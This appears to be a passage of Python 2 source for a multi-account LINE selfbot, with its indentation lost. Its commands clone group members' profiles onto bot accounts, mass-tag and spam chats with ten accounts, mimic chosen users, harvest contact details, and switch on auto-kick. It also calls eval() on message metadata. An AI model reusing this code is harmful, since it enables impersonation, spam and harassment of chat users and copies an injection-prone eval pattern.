elif "Rey4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "Rey5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "Rey6 mid" == msg.text:
ki6.sendText(msg.to,ki6mid)
elif "Rey7 mid" == msg.text:
ki7.sendText(msg.to,ki7mid)
elif "Rey8 mid" == msg.text:
ki8.sendText(msg.to,ki8mid)
elif "Rey9 mid" == msg.text:
ki9.sendText(msg.to,ki9mid)
elif "Rey10 mid" == msg.text:
ki10.sendText(msg.to,ki10mid)
elif "all mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
ki6.sendText(msg.to,ki6mid)
ki7.sendText(msg.to,ki7mid)
ki8.sendText(msg.to,ki8mid)
ki9.sendText(msg.to,ki9mid)
ki10.sendText(msg.to,ki10mid)
elif "Rey:" in msg.text:
tl_text = msg.text.replace("Rey:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "All:" in msg.text:
string = msg.text.replace("All:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
elif "Allbio:" in msg.text:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
elif "Mybio " in msg.text:
string = msg.text.replace("Mybio ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Done")
elif "Myname:" in msg.text:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉 " + string + "👈")
elif "Rey1 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey1 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey2 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey2 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey3 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey3 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey4 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey4 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki4.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey5 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey5 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey6 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey6 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki6.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey7 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey7 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki7.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki7.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey8 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey8 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki8.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki8.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey9 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey9 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki9.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki9.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey10 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey10 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki10.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif msg.text in ["Backup all"]:
try:
ki.updateDisplayPicture(backup1.pictureStatus)
ki.updateProfile(backup1)
ki2.updateDisplayPicture(backup2.pictureStatus)
ki2.updateProfile(backup2)
ki3.updateDisplayPicture(backup3.pictureStatus)
ki3.updateProfile(backup3)
ki4.updateDisplayPicture(backup4.pictureStatus)
ki4.updateProfile(backup4)
ki5.updateDisplayPicture(backup5.pictureStatus)
ki5.updateProfile(backup5)
ki6.updateDisplayPicture(backup6.pictureStatus)
ki6.updateProfile(backup6)
ki7.updateDisplayPicture(backup7.pictureStatus)
ki7.updateProfile(backup7)
ki8.updateDisplayPicture(backup8.pictureStatus)
ki8.updateProfile(backup8)
ki9.updateDisplayPicture(backup9.pictureStatus)
ki9.updateProfile(backup9)
ki10.updateDisplayPicture(backup10.pictureStatus)
ki10.updateProfile(backup10)
cl.sendText(msg.to, "All Done (^_^)")
except Exception as e:
cl.sendText(msg.to, str(e))
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Cipok","Rey Tagall"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
#---------------------------------------------------------
elif "1name:" in msg.text:
string = msg.text.replace("1name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "2name:" in msg.text:
string = msg.text.replace("2name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "3name:" in msg.text:
string = msg.text.replace("3name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "4name:" in msg.text:
string = msg.text.replace("4name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "5name:" in msg.text:
string = msg.text.replace("5name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "6name:" in msg.text:
string = msg.text.replace("6name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "7name:" in msg.text:
string = msg.text.replace("7name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki7.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "8name:" in msg.text:
string = msg.text.replace("8name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki8.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "9name:" in msg.text:
string = msg.text.replace("9name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki9.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "10name:" in msg.text:
string = msg.text.replace("10name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki10.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif msg.text.lower() == 'responsename':
profile = ki.getProfile()
text = profile.displayName + ""
ki.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ1")
profile = ki2.getProfile()
text = profile.displayName + ""
ki2.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ2")
profile = ki3.getProfile()
text = profile.displayName + ""
ki3.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ3")
profile = ki4.getProfile()
text = profile.displayName + ""
ki4.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ4")
profile = ki5.getProfile()
text = profile.displayName + ""
ki5.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ5")
profile = ki6.getProfile()
text = profile.displayName + ""
ki6.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ6")
profile = ki7.getProfile()
text = profile.displayName + ""
ki7.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ7")
profile = ki8.getProfile()
text = profile.displayName + ""
ki8.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ8")
profile = ki9.getProfile()
text = profile.displayName + ""
ki9.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ9")
profile = ki10.getProfile()
text = profile.displayName + ""
ki10.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ10")
#--------------------------------------------------------
elif "Mid:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Set member: " in msg.text:
if msg.from_ in admin:
jml = msg.text.replace("Set member: ","")
wait["Members"] = int(jml)
cl.sendText(msg.to, "Jumlah minimal member telah di set : "+jml)
elif ("Repadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
ki3.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Repdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
ki3.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
ki3.sendText(msg.to,"Nothing")
else:
mc = "Target Mimic User:\n"
for mi_d in mimic["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
ki3.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
ki3.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
ki3.sendText(msg.to,"Mimic change to target")
else:
ki3.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
wait["Mimic"] = True
mimic["status"] = True
ki3.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
wait["Mimic"] = False
mimic["status"] = False
ki3.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Add all" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
elif msg.text in ["Invite"]:
wait["invite"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Spam"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Aku belum mandi")
ki2.sendText(msg.to,"Tak tun tuang")
ki3.sendText(msg.to,"Tak tun tuang")
ki3.sendText(msg.to,"Tapi masih cantik juga")
ki4.sendText(msg.to,"Tak tun tuang")
ki5.sendText(msg.to,"Tak tun tuang")
ki6.sendText(msg.to,"apalagi kalau sudah mandi")
ki7.sendText(msg.to,"Tak tun tuang")
ki8.sendText(msg.to,"Pasti cantik sekali")
ki9.sendText(msg.to,"yiha")
ki10.sendText(msg.to,"Kalau orang lain melihatku")
ki.sendText(msg.to,"Tak tun tuang")
ki2.sendText(msg.to,"Badak aku taba bana")
ki3.sendText(msg.to,"Tak tun tuang")
ki4.sendText(msg.to,"Tak tuntuang")
ki5.sendText(msg.to,"Tapi kalau langsuang diidu")
ki6.sendText(msg.to,"Tak tun tuang")
ki7.sendText(msg.to,"Atagfirullah baunya")
ki8.sendText(msg.to,"Males lanjutin ah")
ki9.sendText(msg.to,"Sepi bat")
ki10.sendText(msg.to,"Iya sepi udah udah")
ki.sendText(msg.to,"Gaada yang denger juga kita nyanyi")
ki2.sendText(msg.to,"Nah")
ki3.sendText(msg.to,"Mending gua makan dulu")
ki4.sendText(msg.to,"Siyap")
ki5.sendText(msg.to,"Okeh")
ki6.sendText(msg.to,"Katanya owner kita Jomblo ya")
ki7.sendText(msg.to,"Iya emang")
ki8.sendText(msg.to,"Denger denger si lagi nyari pacar doi")
ki9.sendText(msg.to,"Udah ah gosip mulu doain aja biar dapet")
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Group image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ki.sendImageWithURL(msg.to,path)
elif "Urlgroup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendText(msg.to,path)
elif "Name" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = ki.getContact(key1)
cu = ki.channel.getCover(key1)
try:
ki.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
ki.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Profile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
ki.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
ki2.sendText(msg.to,"Profile Picture " + contact.displayName)
ki3.sendImageWithURL(msg.to,image)
ki4.sendText(msg.to,"Cover " + contact.displayName)
ki5.sendImageWithURL(msg.to,path)
except:
pass
elif "Contact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Info" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Bio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot Sudah Berjalan Selama :\n"+waktu(eltime)
cl.sendText(msg.to,van)
ki.sendText(msg.to,van)
ki2.sendText(msg.to,van)
ki3.sendText(msg.to,van)
ki4.sendText(msg.to,van)
ki5.sendText(msg.to,van)
ki6.sendText(msg.to,van)
ki7.sendText(msg.to,van)
ki8.sendText(msg.to,van)
ki9.sendText(msg.to,van)
ki10.sendText(msg.to,van)
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"========== I N F O R M A S I ==========\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n========== I N F O R M A S I ==========")
elif msg.text in ["Kalender","Time","Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "SearchID: " in msg.text:
userid = msg.text.replace("SearchID: ","")
contact = cl.findContactsByUserid(userid)
msg.contentType = 13
msg.contentMetadata = {'mid': contact.mid}
ki.sendMessage(msg)
elif "Searchid: " in msg.text:
userid = msg.text.replace("Searchid: ","")
contact = cl.findContactsByUserid(userid)
msg.contentType = 13
msg.contentMetadata = {'mid': contact.mid}
ki.sendMessage(msg)
elif "removechat" in msg.text.lower():
if msg.from_ in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
ki2.removeAllMessages(op.param2)
ki3.removeAllMessages(op.param2)
ki4.removeAllMessages(op.param2)
ki5.removeAllMessages(op.param2)
ki6.removeAllMessages(op.param2)
ki7.removeAllMessages(op.param2)
ki8.removeAllMessages(op.param2)
ki9.removeAllMessages(op.param2)
ki10.removeAllMessages(op.param2)
print "[Command] Remove Chat"
cl.sendText(msg.to,"Done")
ki.sendText(msg.to,"Done")
ki2.sendText(msg.to,"Done")
ki3.sendText(msg.to,"Done")
ki4.sendText(msg.to,"Done")
ki5.sendText(msg.to,"Done")
ki6.sendText(msg.to,"Done")
ki7.sendText(msg.to,"Done")
ki8.sendText(msg.to,"Done")
ki9.sendText(msg.to,"Done")
ki10.sendText(msg.to,"All Messages From Owner To Bot Have Been Deleted Successfully")
except Exception as error:
print error
cl.sendText(msg.to,"Error")
elif "apakah " in msg.text:
apk = msg.text.replace("apakah ","")
rnd = ["Ya","Tidak","Bisa Jadi","Mungkin"]
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
ki.sendAudio(msg.to,"hasil.mp3")
elif "hari " in msg.text:
apk = msg.text.replace("hari ","")
rnd = ["Senin","Selasa","Rabu","Kamis","Jumat","Sabtu","Minggu"]
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
ki2.sendAudio(msg.to,"hasil.mp3")
elif "berapa " in msg.text:
apk = msg.text.replace("berapa ","")
rnd = ['10%','20%','30%','40%','50%','60%','70%','80%','90%','100%','0%']
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
ki3.sendAudio(msg.to,"hasil.mp3")
elif "berapakah " in msg.text:
apk = msg.text.replace("berapakah ","")
rnd = ['1','2','3','4','5','6','7','8','9','10','Tidak Ada']
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
ki4.sendAudio(msg.to,"hasil.mp3")
elif "kapan " in msg.text:
apk = msg.text.replace("kapan ","")
rnd = ["kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi","Tidak Akan Pernah"]
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
ki5.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
wait["Simi"] = True
ki2.sendText(msg.to," Simisimi Di Aktifkan")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
wait["Simi"] = False
ki2.sendText(msg.to,"Simisimi Di Nonaktifkan")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
ki.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
ki.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
ki.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text in ["Notif on"]:
if wait["Sambutan"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Aktifkanヾ(*´∀`*)ノ")
else:
wait["Sambutan"] = True
wait["joinkick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Onヽ(´▽`)/")
elif msg.text in ["Notif off"]:
if wait["Sambutan"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Nonaktifkan( ^∇^)")
else:
wait["Sambutan"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Off(p′︵‵。)")
elif "Sider on" in msg.text:
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
cl.sendText(msg.to,"Siap On Cek Sider")
elif "Sider off" in msg.text:
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
cl.sendText(msg.to, "Cek Sider Off")
else:
cl.sendText(msg.to, "Heh Belom Di Set")
elif "Say " in msg.text:
say = msg.text.replace("Say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
ki.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say welcome" in msg.text:
gs = cl.getGroup(msg.to)
say = msg.text.replace("Say welcome","Selamat Datang Di "+ gs.name)
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Protect on🔓✍")
ki2.sendText(msg.to,"Auto Protect on🔓✍")
ki3.sendText(msg.to,"Auto Protect on🔓✍")
ki4.sendText(msg.to,"Auto Protect on🔓✍")
ki5.sendText(msg.to,"Auto Protect on🔓✍")
ki6.sendText(msg.to,"Auto Protect on🔓✍")
ki7.sendText(msg.to,"Auto Protect on🔓✍")
ki8.sendText(msg.to,"Auto Protect on🔓✍")
ki9.sendText(msg.to,"Auto Protect on🔓✍")
ki10.sendText(msg.to,"Auto Protect on🔓✍")
else:
ki.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["protect"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Protect on🔓✍")
ki2.sendText(msg.to,"Auto Protect on🔓✍")
ki3.sendText(msg.to,"Auto Protect on🔓✍")
ki4.sendText(msg.to,"Auto Protect on🔓✍")
ki5.sendText(msg.to,"Auto Protect on🔓✍")
ki6.sendText(msg.to,"Auto Protect on🔓✍")
ki7.sendText(msg.to,"Auto Protect on🔓✍")
ki8.sendText(msg.to,"Auto Protect on🔓✍")
ki9.sendText(msg.to,"Auto Protect on🔓✍")
ki10.sendText(msg.to,"Auto Protect on🔓✍")
else:
ki.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Qr code On✍")
else:
ki2.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Already on✍")
else:
ki2.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'invitepro on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Invite protect On✍")
else:
ki.sendText(msg.to,"Hal ini sudah terbuka ô€¨����👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Already on✍")
else:
ki.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'cancelprotect on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Cancel Protect on✍ 👈")
else:
ki2.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Already on✍")
else:
ki2.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'auto join on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Login on✍")
else:
ki.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Already on✍")
else:
ki.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'kicker on':
if wait["joinkick"] == True:
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Kicker Auto set On✍")
else:
ki2.sendText(msg.to,"Kicker Auto set On✍")
else:
wait["joinkick"] = True
if wait["lang"] == "JP":
ki2.sendText(msg.to,"Kicker Auto set On✍")
else:
